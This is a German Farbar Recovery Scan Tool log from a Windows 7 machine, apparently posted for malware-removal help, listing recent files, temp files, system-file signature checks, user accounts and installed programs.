(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-06 22:32 - 2017-05-06 22:32 - 00025794 _____ C:\Users\Hamlet\Desktop\FRST.txt
2017-05-06 22:31 - 2017-05-06 22:31 - 00000000 ____D C:\Users\Hamlet\Desktop\FRST-OlderVersion
2017-05-06 22:14 - 2017-05-06 22:14 - 00000022 _____ C:\Windows\S.dirmngr
2017-05-06 19:53 - 2017-05-06 19:53 - 00012389 _____ C:\Users\Hamlet\Desktop\JRT.txt
2017-05-06 19:49 - 2017-05-06 19:49 - 01663672 _____ (Malwarebytes) C:\Users\Hamlet\Desktop\JRT.exe
2017-05-06 19:47 - 2017-05-06 19:40 - 00006994 _____ C:\Users\Hamlet\Desktop\AdwCleaner[C0].txt
2017-05-06 19:47 - 2017-05-06 19:39 - 00006454 _____ C:\Users\Hamlet\Desktop\AdwCleaner[S0].txt
2017-05-06 19:34 - 2017-05-06 22:26 - 00000000 ____D C:\AdwCleaner
2017-05-06 19:32 - 2017-05-06 19:31 - 04102600 _____ C:\Users\Hamlet\Desktop\AdwCleaner_6.046.exe
2017-05-06 17:17 - 2017-05-06 17:17 - 00001040 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-06 17:17 - 2017-05-06 17:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-06 17:17 - 2017-05-06 17:17 - 00000000 ____D C:\Program Files\VS Revo Group
2017-05-06 10:22 - 2017-05-06 18:58 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-05-06 10:21 - 2017-05-06 18:58 - 00000000 ____D C:\Users\Hamlet\Desktop\mbar
2017-05-06 10:20 - 2017-05-06 10:20 - 16563352 _____ (Malwarebytes Corp.) C:\Users\Hamlet\Desktop\mbar-1.09.3.1001.exe
2017-05-06 02:33 - 2017-05-06 02:33 - 07013752 _____ (Tim Kosse) C:\Users\Hamlet\Downloads\FileZilla_3.25.2_win64-setup.exe
2017-05-06 02:11 - 2017-05-06 02:11 - 00003923 _____ C:\Users\Hamlet\Desktop\Funde.txt
2017-05-05 23:09 - 2017-05-05 23:11 - 00072742 _____ C:\Users\Hamlet\Desktop\Additionalt.txt
2017-05-05 23:09 - 2017-05-05 23:11 - 00048450 _____ C:\Users\Hamlet\Desktop\FRSTalt.txt
2017-05-05 23:08 - 2017-05-06 22:31 - 02429440 _____ (Farbar) C:\Users\Hamlet\Desktop\FRST64.exe
2017-05-05 13:38 - 2017-05-06 22:32 - 00000000 ____D C:\FRST
2017-05-02 00:20 - 2017-05-02 00:20 - 00001106 _____ C:\Users\Hamlet\Desktop\Avast Meldungen.lnk
2017-05-01 01:56 - 2013-07-19 14:01 - 00001133 _____ C:\Users\Hamlet\Desktop\Opera.lnk
2017-04-30 14:17 - 2017-05-06 22:15 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-30 14:17 - 2017-05-06 22:15 - 00111544 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-04-30 14:17 - 2017-05-06 22:15 - 00082720 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-04-30 14:17 - 2017-05-06 22:15 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-04-30 14:17 - 2017-05-06 20:04 - 00186304 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-04-30 14:17 - 2017-04-30 14:17 - 00001873 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-30 14:17 - 2017-04-30 14:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-30 14:17 - 2017-04-30 14:17 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-30 14:17 - 2017-03-22 11:02 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-04-30 05:18 - 2017-05-06 09:45 - 00002127 _____ C:\Users\Public\BuBa.ini
2017-04-30 04:55 - 2017-05-06 22:14 - 00000060 _____ C:\Windows\system32\s
2017-04-30 04:41 - 2017-04-30 04:41 - 00003444 _____ C:\Windows\System32\Tasks\Mysa
2017-04-30 04:41 - 2017-04-30 04:41 - 00000005 _____ C:\Windows\system32\1.txt
2017-04-29 03:36 - 2017-04-29 03:36 - 00000783 _____ C:\Users\Hamlet\.gitconfig
2017-04-27 23:51 - 2017-04-27 23:51 - 00003450 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001Core1d2bfa05e8820a2
2017-04-27 01:23 - 2017-04-27 02:35 - 00000000 ____D C:\Users\Hamlet\AppData\Local\VirtualStore
2017-04-27 01:08 - 2017-04-27 01:08 - 01238016 _____ (SQLite Development Team) C:\Windows\system32\sqlite3.dll
2017-04-27 01:08 - 2017-04-27 01:08 - 00533745 _____ C:\Windows\system32\sqlite.zip
2017-04-27 01:08 - 2017-04-27 01:08 - 00004721 _____ C:\Windows\system32\sqlite3.def
2017-04-26 18:32 - 2017-03-15 11:49 - 00223232 _____ C:\Windows\SysWOW64\TMSWebOSMapsDXE7.bpl
2017-04-26 18:32 - 2014-05-07 10:49 - 00216064 _____ C:\Windows\SysWOW64\TMSWebOSMapsDXE6.bpl
2017-04-23 02:10 - 2017-04-23 02:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2017-04-22 13:21 - 2017-04-22 13:21 - 00000000 ____H C:\Users\Hamlet\Documents\Default.rdp
2017-04-22 05:23 - 2017-04-22 05:23 - 00001560 _____ C:\Users\Hamlet\Desktop\TMS FMX Gui.lnk
2017-04-18 19:36 - 2017-04-18 19:36 - 00292080 _____ C:\Windows\Minidump\041817-29437-01.dmp
2017-04-13 16:49 - 2017-04-25 22:45 - 00001659 _____ C:\Users\Hamlet\Desktop\HSuper64.lnk
2017-04-13 16:48 - 2017-04-25 16:32 - 00001659 _____ C:\Users\Hamlet\Desktop\HSuper-32.lnk
2017-04-13 00:12 - 2017-04-13 00:07 - 00000826 _____ C:\Users\Hamlet\Desktop\Git GUI.lnk
2017-04-13 00:12 - 2017-04-13 00:07 - 00000778 _____ C:\Users\Hamlet\Desktop\Git CMD.lnk
2017-04-13 00:07 - 2017-04-13 00:07 - 00000801 _____ C:\Users\Public\Desktop\Git Bash.lnk
2017-04-13 00:07 - 2017-04-13 00:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Git
2017-04-13 00:07 - 2017-04-13 00:07 - 00000000 ____D C:\ProgramData\Git
2017-04-12 18:03 - 2015-11-22 17:31 - 00001848 _____ C:\Users\Hamlet\Desktop\Seattle.txt
2017-04-12 16:21 - 2017-04-12 16:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TMS FMX UI Pack RS XE7
2017-04-11 15:12 - 2017-04-11 15:12 - 00001073 _____ C:\Users\Public\Desktop\VirtualBox.lnk
2017-04-11 15:12 - 2017-03-15 16:18 - 00959720 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxDrv.sys
2017-04-08 13:35 - 2017-04-08 13:35 - 00001213 _____ C:\Users\Hamlet\Desktop\W7Ulti64.lnk
2017-04-07 22:46 - 2017-04-07 22:46 - 00000000 ____D C:\ProgramData\Intel
2017-04-07 22:45 - 2017-04-07 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2017-04-06 11:42 - 2017-04-09 14:22 - 00000000 ____D C:\Users\Hamlet\Desktop\Elevate
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-06 22:24 - 2009-07-14 06:45 - 00026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-05-06 22:24 - 2009-07-14 06:45 - 00026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-05-06 22:22 - 2015-05-28 07:47 - 00013482 _____ C:\Users\Public\FreeCommander.ini
2017-05-06 22:22 - 2013-07-19 14:18 - 00000000 ____D C:\Temp
2017-05-06 22:15 - 2013-12-12 18:36 - 00000000 ____D C:\Users\Hamlet\AppData\Local\TSVNCache
2017-05-06 22:14 - 2013-08-10 16:17 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2017-05-06 22:14 - 2013-07-20 01:53 - 00000000 ____D C:\ProgramData\Embarcadero
2017-05-06 22:14 - 2013-07-19 14:00 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2017-05-06 22:14 - 2013-07-19 13:03 - 00000000 ____D C:\ProgramData\NVIDIA
2017-05-06 22:14 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-06 20:36 - 2013-07-19 14:00 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2017-05-06 20:29 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\tracing
2017-05-06 19:40 - 2013-11-09 12:31 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\Yahoo!
2017-05-06 18:59 - 2016-08-14 19:20 - 00000000 ____D C:\ProgramData\AVAST Software
2017-05-06 18:59 - 2013-07-19 14:10 - 00000000 ____D C:\Program Files\Utils
2017-05-06 17:28 - 2014-03-23 11:47 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\vlc
2017-05-06 17:13 - 2013-08-15 14:16 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\FileZilla
2017-05-06 16:15 - 2015-08-30 04:01 - 00124522 _____ C:\Users\Hamlet\Desktop\Zwischen.txt
2017-05-06 10:23 - 2014-11-27 10:46 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-06 09:48 - 2013-07-20 02:17 - 00000000 ____D C:\ProgramData\firebird
2017-05-06 02:33 - 2014-07-25 18:47 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FileZilla
2017-05-06 02:20 - 2013-07-19 14:01 - 00000000 ____D C:\Program Files (x86)\Opera
2017-05-05 23:21 - 2016-02-19 04:31 - 00000000 ____D C:\Users\Hamlet\Documents\Web-Recherchen
2017-05-05 23:20 - 2013-07-19 14:06 - 00000000 ____D C:\Program Files (x86)\Internet
2017-05-05 23:18 - 2015-02-07 02:26 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\DVDVideoSoft
2017-05-05 23:17 - 2017-04-04 17:30 - 00000000 ____D C:\ProgramData\Elevate Software
2017-05-05 23:13 - 2016-09-04 08:20 - 00000000 ____D C:\Users\Hamlet\AppData\Local\ABBYY
2017-05-05 23:13 - 2016-09-04 08:20 - 00000000 ____D C:\ProgramData\ABBYY
2017-05-05 23:13 - 2016-09-04 08:20 - 00000000 ____D C:\Program Files (x86)\ABBYY
2017-05-05 21:49 - 2016-04-29 16:13 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\gnupg
2017-05-05 13:47 - 2015-05-16 21:56 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-30 19:29 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2017-04-30 19:28 - 2013-11-12 17:38 - 00000000 ____D C:\Windows\pss
2017-04-30 19:23 - 2016-12-25 10:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-04-30 19:23 - 2013-10-22 17:48 - 00000000 ____D C:\ProgramData\Oracle
2017-04-30 19:23 - 2013-07-26 01:59 - 00000000 ____D C:\Program Files (x86)\Java
2017-04-30 19:22 - 2016-12-25 10:47 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2017-04-30 19:07 - 2013-12-07 18:03 - 00007608 _____ C:\Users\Hamlet\AppData\Local\Resmon.ResmonCfg
2017-04-30 14:16 - 2013-07-19 13:14 - 00000000 ____D C:\Program Files (x86)\Utils
2017-04-30 05:44 - 2013-11-09 12:26 - 00000000 ____D C:\Program Files (x86)\HP
2017-04-30 05:36 - 2013-07-20 21:33 - 00000000 ____D C:\Users\Hamlet\.VirtualBox
2017-04-30 05:25 - 2009-07-14 06:45 - 00507400 _____ C:\Windows\system32\FNTCACHE.DAT
2017-04-29 07:14 - 2015-10-05 09:54 - 00000000 ____D C:\Users\Hamlet\AppData\Local\Downloaded Installations
2017-04-29 06:53 - 2013-09-29 05:44 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\Audacity
2017-04-29 03:36 - 2013-07-19 12:53 - 00000000 ____D C:\Users\Hamlet
2017-04-28 11:17 - 2013-07-20 01:08 - 00000000 ____D C:\Users\Hamlet\AppData\Local\Microsoft Help
2017-04-27 23:51 - 2015-04-19 23:41 - 00003722 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001UA
2017-04-27 01:17 - 2014-06-21 10:47 - 00003864 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1374235318
2017-04-27 01:09 - 2009-07-14 04:34 - 00000957 _____ C:\Windows\win.ini
2017-04-26 18:32 - 2015-07-08 14:40 - 00000000 ____D C:\Users\Public\Documents\tmssoftware
2017-04-26 18:32 - 2014-12-19 14:31 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero RAD Studio XE7
2017-04-26 00:09 - 2013-08-09 01:54 - 00000000 ____D C:\Users\Hamlet\Documents\SQL Server Management Studio
2017-04-25 13:02 - 2013-08-30 05:12 - 00000000 ____D C:\Users\Hamlet\AppData\Local\CrashDumps
2017-04-25 08:19 - 2016-07-19 00:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HK-Software
2017-04-25 08:19 - 2016-07-19 00:50 - 00000000 ____D C:\Program Files (x86)\HK-Software
2017-04-24 18:46 - 2017-01-25 10:03 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\typhon64
2017-04-23 01:54 - 2013-07-20 03:26 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-18 19:59 - 2014-07-04 10:32 - 00000000 ____D C:\Users\Hamlet\AppData\Local\Adobe
2017-04-18 19:59 - 2013-07-20 03:26 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-18 19:59 - 2013-07-20 03:26 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-18 19:59 - 2013-07-20 03:26 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-18 19:36 - 2013-08-16 21:41 - 00000000 ____D C:\Windows\Minidump
2017-04-12 23:51 - 2013-08-09 10:06 - 00000000 ____D C:\Users\Hamlet\Documents\Visual Studio 2012
2017-04-12 23:51 - 2013-08-09 01:21 - 00000000 ____D C:\Users\Hamlet\Documents\Visual Studio 2010
2017-04-12 23:51 - 2013-07-20 01:09 - 00000000 ____D C:\Users\Hamlet\Documents\Visual Studio 2008
2017-04-12 23:47 - 2014-01-11 19:41 - 00006107 _____ C:\Users\Hamlet\.bash_history
2017-04-12 18:05 - 2017-03-24 20:43 - 00000000 ___HD C:\ProgramData\{5D50B637-4756-435A-816E-68ABFE86FC69}
2017-04-12 08:40 - 2014-01-11 04:15 - 00000000 ____D C:\ProgramData\VMware
2017-04-12 01:06 - 2015-11-04 14:56 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-04-11 02:44 - 2015-04-19 23:41 - 00003450 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001Core
2017-04-07 22:49 - 2013-08-09 09:22 - 00000000 ____D C:\ProgramData\Package Cache
2017-04-07 22:48 - 2013-08-10 18:17 - 00000000 ____D C:\Program Files (x86)\Intel
2017-04-06 17:42 - 2017-01-25 10:03 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\typhon32
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2016-01-25 22:14 - 2016-01-25 22:14 - 0000119 _____ () C:\Program Files (x86)\firebird.log
2013-09-29 05:19 - 2016-09-03 14:56 - 0000089 _____ () C:\Users\Hamlet\AppData\Roaming\Camdata.ini
2013-09-29 05:19 - 2016-09-03 14:56 - 0000408 _____ () C:\Users\Hamlet\AppData\Roaming\CamLayout.ini
2013-09-29 05:19 - 2016-09-03 14:56 - 0000408 _____ () C:\Users\Hamlet\AppData\Roaming\CamShapes.ini
2013-09-29 05:19 - 2016-09-03 14:56 - 0004527 _____ () C:\Users\Hamlet\AppData\Roaming\CamStudio.cfg
2013-09-30 11:45 - 2013-09-30 11:45 - 0000098 _____ () C:\Users\Hamlet\AppData\Roaming\CamStudio.Producer.command
2013-09-30 12:14 - 2013-09-30 12:14 - 0000000 _____ () C:\Users\Hamlet\AppData\Roaming\CamStudio.Producer.Data.ini
2013-09-30 12:14 - 2013-09-30 12:14 - 0001207 _____ () C:\Users\Hamlet\AppData\Roaming\CamStudio.Producer.ini
2014-04-20 10:47 - 2014-07-06 20:55 - 0000318 _____ () C:\Users\Hamlet\AppData\Roaming\repmand.ini
2014-04-20 10:47 - 2014-07-06 20:55 - 0000033 _____ () C:\Users\Hamlet\AppData\Roaming\repmandlib.ini
2016-01-27 14:09 - 2016-01-27 14:09 - 0013138 _____ () C:\Users\Hamlet\AppData\Roaming\Test.tiff
2014-06-26 12:25 - 2017-03-28 18:37 - 0006144 _____ () C:\Users\Hamlet\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-04-01 06:38 - 2015-04-01 06:38 - 0004096 ____H () C:\Users\Hamlet\AppData\Local\keyfile3.drm
2014-10-01 13:00 - 2014-10-01 13:00 - 0002768 _____ () C:\Users\Hamlet\AppData\Local\recently-used.xbel
2013-12-07 18:03 - 2017-04-30 19:07 - 0007608 _____ () C:\Users\Hamlet\AppData\Local\Resmon.ResmonCfg
2013-11-09 12:25 - 2016-04-10 18:10 - 0017629 _____ () C:\ProgramData\hpzinstall.log
2014-05-16 05:44 - 2014-05-16 05:44 - 0000072 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.64.bc
2013-10-06 10:17 - 2013-10-09 09:14 - 0000043 _____ () C:\ProgramData\PassTresorFB.ini
2013-10-16 14:02 - 2013-10-16 14:02 - 0000042 _____ () C:\ProgramData\PassTresorPro.ini
2013-10-27 20:52 - 2013-10-27 20:52 - 0000044 _____ () C:\ProgramData\PassTresorProXE.ini
2013-12-28 22:54 - 2013-12-28 22:55 - 0000091 _____ () C:\ProgramData\Reportix.ini
Einige Dateien in TEMP:
====================
2017-04-05 13:18 - 2017-04-05 13:18 - 0040960 ____T () C:\Users\Hamlet\AppData\Local\Temp\3zgxynho.dll
2016-12-17 09:12 - 2016-12-17 09:12 - 34115464 _____ (Ellora Assets Corporation ) C:\Users\Hamlet\AppData\Local\Temp\FreemakeVideoConverterFull.exe
2016-12-17 09:10 - 2016-12-17 09:10 - 18908032 _____ (Ellora Assets Corporation ) C:\Users\Hamlet\AppData\Local\Temp\FreemakeVideoDownloaderFull.exe
2016-04-10 19:10 - 2016-04-10 19:10 - 2959504 _____ (Hewlett-Packard ) C:\Users\Hamlet\AppData\Local\Temp\hpusetup.exe
2016-08-15 01:26 - 2016-08-15 01:26 - 0741440 _____ (Oracle Corporation) C:\Users\Hamlet\AppData\Local\Temp\jre-8u101-windows-au.exe
2016-12-08 21:52 - 2016-12-08 21:52 - 0737856 _____ (Oracle Corporation) C:\Users\Hamlet\AppData\Local\Temp\jre-8u111-windows-au.exe
2017-02-17 14:50 - 2017-02-17 14:50 - 0739904 _____ (Oracle Corporation) C:\Users\Hamlet\AppData\Local\Temp\jre-8u121-windows-au.exe
2017-04-30 19:21 - 2017-04-30 19:21 - 0739904 _____ (Oracle Corporation) C:\Users\Hamlet\AppData\Local\Temp\jre-8u131-windows-au.exe
2016-01-16 04:21 - 2016-01-16 04:21 - 0585824 _____ (Oracle Corporation) C:\Users\Hamlet\AppData\Local\Temp\jre-8u66-windows-au.exe
2017-04-20 13:14 - 2017-04-20 13:14 - 0027648 _____ () C:\Users\Hamlet\AppData\Local\Temp\uhqo23fw.dll
2017-04-01 00:46 - 2017-04-01 00:46 - 0040960 ____T () C:\Users\Hamlet\AppData\Local\Temp\vkgpjmdp.dll
2016-06-13 00:46 - 2016-06-13 00:46 - 31717016 _____ () C:\Users\Hamlet\AppData\Local\Temp\vlc-2.2.4-win64.exe
2013-09-11 15:54 - 2013-09-11 15:54 - 0450560 ____R (Macrovision Corporation) C:\Users\Hamlet\AppData\Local\Temp\_isD8DF.exe
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-05-06 00:52
==================== Ende von FRST.txt ============================
Code:
Alles auswählen Aufklappen ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 06-05-2017
durchgeführt von Hamlet (06-05-2017 22:34:26)
Gestartet von C:\Users\Hamlet\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-07-19 10:53:02)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-2254724001-3966478908-1047364323-500 - Administrator - Enabled) => C:\Users\Administrator
Entwickler (S-1-5-21-2254724001-3966478908-1047364323-1012 - Limited - Enabled) => C:\Users\Entwickler
Gast (S-1-5-21-2254724001-3966478908-1047364323-501 - Limited - Disabled)
Hamlet (S-1-5-21-2254724001-3966478908-1047364323-1001 - Administrator - Enabled) => C:\Users\Hamlet
IUSR_Servs (S-1-5-21-2254724001-3966478908-1047364323-1016 - Limited - Enabled)
UpdatusUser (S-1-5-21-2254724001-3966478908-1047364323-1003 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
4500_G510gm_Help (x32 Version: 000.0.440.000 - Hewlett-Packard) Hidden
4500G510gm (x32 Version: 000.0.423.000 - Hewlett-Packard) Hidden
4500G510gm_Software_Min (x32 Version: 000.0.423.000 - Hewlett-Packard) Hidden
64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
7-Zip 16.02 (x64 edition) (HKLM\...\{23170F69-40C1-2702-1602-000001000000}) (Version: 16.02.00.0 - Igor Pavlov)
ACDSee 4.0 PowerPack Suite (HKLM-x32\...\{92E64C51-5096-442F-9A44-61CB2941391D}) (Version: 4.00.0000 - ACD Systems Ltd)
Active@ ISO Burner (HKLM-x32\...\{7694E0B1-2332-448B-9235-929F84B41E3F}) (Version: 2.5.1 - LSoft Technologies)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe CSI CS4 x64 (Version: 1 - Adobe Systems Incorporated) Hidden
Adobe Dreamweaver CS4 (HKLM-x32\...\Adobe_acce07fd2c8fe7f9e3f26243e626578) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.148 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.127 - Adobe Systems Incorporated)
Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
Audiograbber 1.83 SE (HKLM-x32\...\Audiograbber) (Version: 1.83 SE - Audiograbber Deutschland)
AutoIt v3.3.14.1 (HKLM-x32\...\AutoItv3) (Version: 3.3.14.1 - AutoIt Team)
AutoIT-Recorder (HKLM-x32\...\{6D580F34-B267-4914-816D-AF0AF362CA6D}) (Version: 1.0.1 - INET-Consulting)
AVM FRITZ!Box Dokumentation (HKLM-x32\...\AVMFBox) (Version: - AVM Berlin)
BDE_ENT (x32 Version: 5.1.1 - Borland Software Corp.) Hidden
Boost Libraries for C++Builder 2009 (HKLM-x32\...\Boost Libraries for C++Builder 2009) (Version: - CodeGear)
Boost Libraries for C++Builder 2009 (x32 Version: 6.0 - CodeGear) Hidden
Boost Libraries for Embarcadero Developer Tools (HKLM-x32\...\Boost Libraries for Embarcadero Developer Tools) (Version: 15.0 - Embarcadero Technologies, Inc.)
Boost Libraries for Embarcadero Developer Tools (x32 Version: 15.0 - Embarcadero Technologies, Inc.) Hidden
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
calibre 64bit (HKLM\...\{681661E2-CB98-400A-BAC5-F573BE396948}) (Version: 2.82.0 - Kovid Goyal)
CamStudio 2.7.2 (HKLM\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7.2 - CamStudio Open Source)
CamStudio Lossless Codec v1.5 (HKLM-x32\...\camcodec) (Version: 1.5 - CamStudio)
CamStudio version 2.7 (HKLM-x32\...\{04B83666-3A62-452B-85D3-70F8117F2329}_is1) (Version: 2.7 - CamStudio Open Source)
Canon MP Navigator EX 2.0 (HKLM-x32\...\MP Navigator EX 2.0) (Version: - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version: - )
CanoScan LiDE 100 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ2413) (Version: - )
CodeGear Delphi and C++Builder 2009 Database Pack (HKLM-x32\...\CodeGear Delphi and C++Builder 2009 Database Pack) (Version: - CodeGear)
CodeGear Delphi and C++Builder 2009 Database Pack (x32 Version: 6.0 - CodeGear) Hidden
CodeGear Delphi and C++Builder 2009 Help System (HKLM-x32\...\CodeGear Delphi and C++Builder 2009 Help System) (Version: - CodeGear)
CodeGear Delphi and C++Builder 2009 Help System (x32 Version: 6.0 - CodeGear) Hidden
CodeGear RAD Studio 2009 (HKU\S-1-5-21-2254724001-3966478908-1047364323-1001\...\CodeGear RAD Studio 2009) (Version: - CodeGear)
CodeGear RAD Studio 2009 (x32 Version: 6.0 - CodeGear) Hidden
CodeSite Express 5 (HKLM-x32\...\CodeSite Express 5_is1) (Version: 5.1.6 - Raize Software, Inc.)
CodeSite Express 5.1 (HKLM-x32\...\CodeSite Express 5.1) (Version: 5.1 - Raize Software, Inc.)
CollabNet Subversion Client 1.7.5 (HKLM-x32\...\CollabNet Subversion Client) (Version: 1.7.5 - CollabNet)
Connect (x32 Version: 1.0.0.1 - Adobe Systems Incorporated) Hidden
Consic FbAdmin 2.1.6 (HKLM-x32\...\Consic FbAdmin_is1) (Version: - Consic Software Engineering)
Cool Edit 2000 (HKLM-x32\...\Cool Edit 2000) (Version: - )
Corel Graphics Suite 11 (x32 Version: 11 - Corel Corporation) Hidden
CorelDRAW Graphics Suite 11 (HKLM-x32\...\InstallShield_{1C63DD23-6554-4A1F-8D0D-B5A6B49D8015}) (Version: 11 - Corel Corporation)
CorelDRAW Graphics Suite X5 - Windows Shell Extension 64 Bit (Version: 15.0.487 - Corel Corporation) Hidden
CrypTool 1.4.31 (HKLM-x32\...\CrypTool) (Version: 1.4.31 - )
DelphiZip TZipMaster (HKLM-x32\...\{49BEF1D4-8E4F-4565-87D0-18E5258A3994}}_is1) (Version: 1.9.1.0017 - DelphiZip)
Destinations (x32 Version: 130.0.0.0 - Hewlett-Packard) Hidden
Devart IBDAC 4.1.5 for Embarcadero RAD Studio XE2 (HKLM-x32\...\IBDAC Delphi 16_is1) (Version: - Devart)
Devart IBDAC 4.6.12 for CodeGear RAD Studio 2009 (HKLM-x32\...\IBDAC Delphi 12_is1) (Version: - Devart)
Devenv-Ressourcen für Microsoft Visual Studio 2012 (x32 Version: 11.0.50727 - Microsoft Corporation) Hidden
DeviceDiscovery (x32 Version: 130.0.372.000 - Hewlett-Packard) Hidden
DevJET Documentation Insight Express Edition V2.0.3.251 (HKLM-x32\...\{F62B6FC9-BECA-4209-9F8E-09528DC143BE}_is1) (Version: - DevJET)
DocMgr (x32 Version: 130.0.000.000 - Ihr Firmenname) Hidden
